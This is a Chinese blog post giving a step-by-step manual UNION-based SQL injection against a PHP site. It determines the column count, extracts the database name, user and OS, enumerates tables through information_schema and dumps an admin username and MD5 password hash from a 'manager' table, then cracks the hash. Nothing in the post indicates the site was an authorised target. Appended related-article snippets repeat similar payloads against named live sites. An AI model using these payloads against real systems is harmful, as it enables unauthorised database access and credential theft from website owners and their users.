php手工注入拿后台

最新推荐文章于 2021-04-04 14:33:33 发布
最新推荐文章于 2021-04-04 14:33:33 发布
阅读量874 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: sql注入 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Three_fish/article/details/47136937

http://www.XXXXX.com.cn/company_detail.php?id=16 

and 1=1 看一下 正常

and 1=2 错误

order by 8 正常

order by 9 错误 说明就是8

UNION SELECT 1,2,3,4,5,6,7,8      8个   出现数字 2 与 6


version()获取版本
database()获取数据库名
user()获取当前用户
@@version_compile_os 获取操作系统信息

先获取版本信息
http://www.XXXXX.com.cn/company_detail.php?id=16  UNION SELECT 1,2,3,4,5,version(),7,8
就是(注入点 UNION SELECT version())注意version()是插在显位数字那里的。

5.1.33-community   大于5.0 可以用这种方法注入

UNION SELECT 1,2,3,4,5,database(),7,8

UNION SELECT 1,2,3,4,5,user(),7,8

UNION SELECT 1,2,3,4,5,@@version_compile_os,7,8

最终得到 


version()  5.1.33-community 
database()  sq_*****
user() *****@localhost
@@version_compile_os  Win32


【然后下面就是重点了,这个东西是死的,大家只要记住就可以。我留个公式下来:】
-------------------------------------------嘿嘿,在吗----------------------------------------------------


获取表名:
注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名)
获取表段和字段:
注入点 UNION SELECT 1,column_name from information_schema.columns where table_name=编码后(表名)
获取指定表下的指定字段信息
注入点 UNION SELECT 1,字段名 from 表名

注意数字 1,2,3,4,5,6,7,8  这里给的是1,2 是不对的

-------------------------------------------在啊,有事吗----------------------------------------------------


首先来获取表名:
注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名)

hex编码

http://www.107000.com/T-Hex/   将得到的结果前面加上 0x


我这里是 0x73715f****6a7873   则为 

UNION SELECT 1,2,3,4,5,table_name,7,8 from information_schema.tables where table_schema=0x73715f****6a7873

看上面的语句会发现information_schema.tables 为什么要写这串英文呢?因为版本大于5.0的话有个自带的表,就是它     所有如果小于5.0就么有这张表 注入语句也不会这么写。

得到 ***config  没有全部爆出来

(如果没有全部爆出来,我们只需要把table_name用英文括号括起来,前面加个group_concat 再次访问,就可以获取到所有表)

UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=0x73715f****6a7873

得到 全部表 包括 manager  一看就知道是这个

编码 manager  得0x6d616e6167657220

UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x6d616e6167657220

结果不是  因为 用这个返回正常的页面

得到 MName MPsw


此时的语句就简单多了:
获取指定表下的指定字段信息
注入点 UNION SELECT 1,2,3,4,5,字段名,7,8 from 表名

即 UNION SELECT 1,2,3,4,5,concat(0x3a,MName,0x3a,MPsw),7,8 from manager

得到     :xyc:99D75B460B05C7D660D7069A0A4D4B4B

即用户名xyc 密码的密文为99D75B460B05C7D660D7069A0A4D4B4B    MD5解密得  7238809













mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 791
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
65.网络安全渗透测试—[SQL注入篇4]—[MySQL+PHP-手工注入详解]
qwsn
08-23 2142
我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 注入前置知识点 1、mysql的三种注释手段: 2、注入时常用的系统信息函数: 3、判断是否存在注入:`and/or逻辑语句` 4、判断字段/列数:`order by排序` 5、联合查询:
PHP、mysql(手工注入
10-12
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
PHP手工注入初探
冰点的博客
08-18 144
注:为了网站的安全,对网址做了处理 ***目标:http://www.lawxxxxxxx.com.cn 注入页面:http://www.lawxxxxxxx.com.cn/article.php?nid=2377 http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那...
PHP手工注入
曲终人散
06-11 1636
后台 www.c**bio.com/mywebmanage     查询版本 http://www/**yjt.com/show_news.php?id=1480 UNION SELECT 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16   5.1   数据库名   tt
php注射库
FreeXploiT
10-24 1352
php注射库作者:swap类别:漏洞资料库发布日期:2004-06-28 14:45:43总浏览:46 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(9
mysql php 注入_记一次php手工注入(mysql)
weixin_39947812的博客
01-18 153
光说不练假把式,关于脚本入侵看的心痒,就实践了一把。首先google:inurl:"php?id="发现这个网站可get注入:http://brand.66wz.com/store.php?id=18试了下http://brand.66wz.com/store.php?id=18and user>0有反应,网页上出现错误提示:然后输入http://brand.66wz.com/store....
网站初级SQL手工注入
05-01
### 知识点一:网站初级SQL手工注入基础概念 SQL手工注入是一种常见的Web安全漏洞利用方式,通过向应用程序提交恶意SQL代码来获取敏感信息、修改数据或控制系统。本知识点将详细阐述SQL手工注入的基本原理及其操作...
php注入教程,PHP手工注入教程
weixin_30454067的博客
03-10 345
一.检测字段长度http://www.osy-wine.com/news_show.php?id=-61 order by 24 报错 说明字段长度是24查看数据库信息http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22...
PHP手工注入经典教程
12-12
特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。特别经典,不看后悔。。。
php手工注入 --,PHP手工注入初探
weixin_39616222的博客
04-04 163
http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那么就是14http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-------------------------...
php手工注入拿webshell
weixin_30344795的博客
08-03 207
  目标网站:http://www.xxx.org.cn:81   注入点: http://www.xxx.org.cn:81/news.php?id=780   1.认识注入类型   不管是asp.aspx.php,注入的标准类型必为   http://www.xxxx.com/aa.asp?p=xxx   http://www.xxxx.com/aa.aspx?p=xxx   ht...
php手工注入语句,PHP+MySQL 手工注入语句大全
weixin_42138716的博客
03-10 324
PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5……n/*利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站...
phpwind后台SQL注入
玄道的网安博客
01-24 1633
0x01 漏洞概述   漏洞程序:phpwind   漏洞影响版本:phpwind_v9.0.2.170426_utf8   Phpwind在后台的备份功能上,存在SQL注入漏洞。可对数据库进行任何的操作。由于需要拿到后台,所以影响范围相对来说还是比较小的。   0x02 代码分析 该代码位于 src/applications/backup/admin/BackupControl...
php+mysql手工注入教程
qq_40083102的博客
11-14 556
php+mysql手工注入教程 http://tieba.baidu.com/p/3723202169
php注释符手工注入,php手工注入
weixin_29359515的博客
03-10 203
http://www.rfidchina.org/products/product.php?id=9740URL后面加上'后,返回的页面虽然没有什么错误信息之类的,页面出错缺失了内容,然后是and 1=1 、and 1=2 ,分别是正常信息和'的页面,在9740前面加了个负号“ - ” ,它没什么意义,和and 1=2 一个作用,出错,http://www.rfidchina.org/produc...
黑客嘿php,php强力手工注入实例演示
weixin_35198152的博客
04-02 129
Qq569780820又好久没更新博客了,惭愧,小菜一个,也么啥好写的,昨天一位朋友在空间说让写个手工注入的帖子,那我就写一个吧。注入环境:php+mysql至于如何判断注入,如何获得页面字段数这些东西我就不说了,网上很多,我原来写的文章里也有,这里就简单的演示一下爆库、爆表和爆列。先判断,页面字段数为8,其中2、4、7是显示位,如图:这里说一下,这个注入点是root,但是load_file和in...
墨者学院sql手工注入
最新发布
03-03
### 关于SQL手工注入的学习 #### SQL手工注入简介 SQL注入是一种常见的Web应用程序攻击方式,通过向查询参数输入恶意的SQL语句片段,从而改变原有SQL命令的行为。这种技术能够绕过身份验证机制、读取敏感数据甚至控制服务器。 #### 靶场环境介绍 墨者学院提供了一个专门用于练习SQL注入技巧的安全测试平台[^2]。此靶场基于Nginx+PHP+MySQL架构构建而成,并且访问成本低廉——仅需消耗一枚虚拟货币“墨币”,新用户注册时通常会被赠送足够的余额来进行多次尝试而不必担心额外开销。 #### 实践案例分析 对于想要深入了解如何实施SQL注入的人来说,在实际操作之前先观察目标网站是否存在潜在可利用之处非常重要。比如查看URL中的GET请求参数是否未经充分过滤就被直接拼接到后台执行的SQL指令里;又或者是POST表单提交的数据项有没有被妥善处理等情形都可能是突破口所在[^1]。 当确认存在风险点之后,则可以根据具体场景采取不同策略展开进一步探索: - **字符型字段**:如果发现某个文本框允许接收任意字符串作为输入值的话,那么就可以试着构造一些特殊模式串去试探内部逻辑反应情况。例如`' OR '1'='1`这样的表达式往往能帮助判断出是否有漏洞存在以及其大致位置范围[^3]。 - **联合查询(UNION SELECT)**:这是一种较为高级但也非常实用的方法之一。它可以让攻击者将自己的SELECT子句附加到原始查询后面并获取更多有用的信息。像下面这条语句就是用来枚举当前库内所有表格名称及其所属数据库名的一个例子: ```sql new_list.php?id=-1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),DATABASE(),4 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() ``` 请注意上述做法仅供合法授权下的渗透测试培训用途,请勿非法入侵任何网络设施! #### 安全建议 为了防止遭受此类威胁影响业务正常运转,开发者应当遵循最佳编码实践指南,如采用预编译语句代替动态组装SQL文法结构;严格校验前端传来的一切外部可控变量合法性;定期审查源码质量排除隐患等等措施加强防护力度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值